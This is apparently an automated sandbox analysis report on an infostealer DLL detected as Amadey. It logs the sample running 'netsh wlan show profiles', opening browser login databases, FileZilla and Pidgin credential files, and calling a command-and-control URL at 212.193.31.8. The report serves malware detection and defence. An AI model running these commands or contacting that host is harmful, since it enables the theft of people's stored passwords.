    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    barindex
    Yara detected Amadeys stealer DLL
    Source: Yara matchFile source: cred64.dll.dll, type: SAMPLE
    Tries to harvest and steal WLAN passwords
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
    Tries to steal Instant Messenger accounts or passwords
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\ZzdeyBaIYtaciMeJGbqNHncTELgaiJWqsMZLRUmLSKq\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\ZzdeyBaIYtaciMeJGbqNHncTELgaiJWqsMZLRUmLSKq\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\ZzdeyBaIYtaciMeJGbqNHncTELgaiJWqsMZLRUmLSKq\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		111
    Process Injection    		1
    Disable or Modify Tools    		2
    OS Credential Dumping    		1
    Security Software Discovery    		Remote Services2
    Data from Local System    		1
    Non-Application Layer Protocol    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		1
    Credentials in Registry    		1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media11
    Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
    Process Injection    		1
    Credentials In Files    		21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Rundll32    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579621 Sample: cred64.dll.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Sigma detected: Capture Wi-Fi password 2->58 60 5 other signatures 2->60 9 loaddll64.exe 1 2->9         started        process3 process4 11 rundll32.exe 21 9->11         started        14 rundll32.exe 24 9->14         started        16 cmd.exe 1 9->16         started        18 3 other processes 9->18 signatures5 70 System process connects to network (likely due to code injection or exploit) 11->70 72 Tries to steal Instant Messenger accounts or passwords 11->72 74 Tries to harvest and steal ftp login credentials 11->74 76 Tries to harvest and steal browser information (history, passwords, etc) 11->76 20 powershell.exe 11->20         started        23 netsh.exe 2 11->23         started        78 Uses netsh to modify the Windows network and firewall settings 14->78 80 Tries to harvest and steal WLAN passwords 14->80 25 powershell.exe 14->25         started        28 netsh.exe 2 14->28         started        30 rundll32.exe 18 16->30         started        process6 dnsIp7 33 conhost.exe 20->33         started        35 conhost.exe 23->35         started        50 C:\Users\user\...\246122658369_Desktop.zip, Zip 25->50 dropped 62 Loading BitLocker PowerShell Module 25->62 37 conhost.exe 25->37         started        39 conhost.exe 28->39         started        52 212.193.31.8, 49730, 49731, 49732 SPD-NETTR Russian Federation 30->52 64 Tries to steal Instant Messenger accounts or passwords 30->64 66 Tries to harvest and steal WLAN passwords 30->66 41 powershell.exe 25 30->41         started        44 netsh.exe 2 30->44         started        file8 signatures9 process10 signatures11 68 Loading BitLocker PowerShell Module 41->68 46 conhost.exe 41->46         started        48 conhost.exe 44->48         started        process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    cred64.dll.dll37%ReversingLabsWin64.Infostealer.Tinba
    cred64.dll.dll39%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fp2e7a.wpc.phicdn.net
    		192.229.221.95
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1true
        		unknown
        http://212.193.31.8/3ofn3jf3e2ljk2/index.phptrue
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://212.193.31.8/lorerrundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.1991200108.0000019339295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279018D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2038525364.0000027910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AC52000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000015.00000002.2036697236.000001C30A2E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30A4C3000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.1991200108.0000019337BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1?rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000015.00000002.2036697236.000001C30AA84000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000011.00000002.1991200108.0000019338FEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279014B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30A7DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://212.193.31.8/Zrundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1e=rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://212.193.31.8/arundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C30AA34000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://212.193.31.8/%rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://212.193.31.8/rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1$rundll32.exe, 00000003.00000002.2312584434.000001D604B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1drundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.1991200108.0000019337BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3093D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.1991200108.0000019339295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.00000279018D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2038525364.0000027910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2143656005.000001C319220000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1artrundll32.exe, 0000000A.00000002.2388934623.0000023142F77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000011.00000002.1991200108.00000193379C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3091B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.1991200108.00000193379C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1986032115.0000027900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2036697236.000001C3091B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1nrundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://212.193.31.8/3ofn3jf3e2ljk2/index.phpgrundll32.exe, 00000003.00000002.2312179824.000001D602CEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://212.193.31.8/nesrundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1srundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1qrundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      212.193.31.8
                                                                      		unknownRussian Federation
                                                                      		57844SPD-NETTRtrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1579621
                                                                      Start date and time:2024-12-23 06:37:06 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 4m 44s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:23
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:cred64.dll.dll
                                                                      (renamed file extension from exe to dll)
                                                                      Original Sample Name:cred64.dll.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 67%
                                                                      • Number of executed functions: 3
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Stop behavior analysis, all processes terminated

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6276 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      00:38:06API Interceptor1x Sleep call for process: loaddll64.exe modified
                                                                      00:38:25API Interceptor58x Sleep call for process: powershell.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      212.193.31.8file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 212.193.31.8/3ofn3jf3e2ljk2/index.php
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                      • 212.193.31.8/3ofn3jf3e2ljk2/index.php
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                      • 212.193.31.8/3ofn3jf3e2ljk2/index.php
                                                                      6X4odkIkyK.exeGet hashmaliciousAmadeyBrowse
                                                                      • 212.193.31.8/3ofn3jf3e2ljk2/index.php

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      fp2e7a.wpc.phicdn.nettg.exeGet hashmaliciousBabadedaBrowse
                                                                      • 192.229.221.95
                                                                      iepdf32.dllGet hashmaliciousUnknownBrowse
                                                                      • 192.229.221.95
                                                                      Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 192.229.221.95
                                                                      62f928.msiGet hashmaliciousRemcosBrowse
                                                                      • 192.229.221.95
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                      • 192.229.221.95
                                                                      P0RN-vidz.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 192.229.221.95
                                                                      uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                      • 192.229.221.95
                                                                      f4p4BwljZt.exeGet hashmaliciousLummaCBrowse
                                                                      • 192.229.221.95
                                                                      Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                      • 192.229.221.95
                                                                      hesaphareketi-20-12-2024-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 192.229.221.95

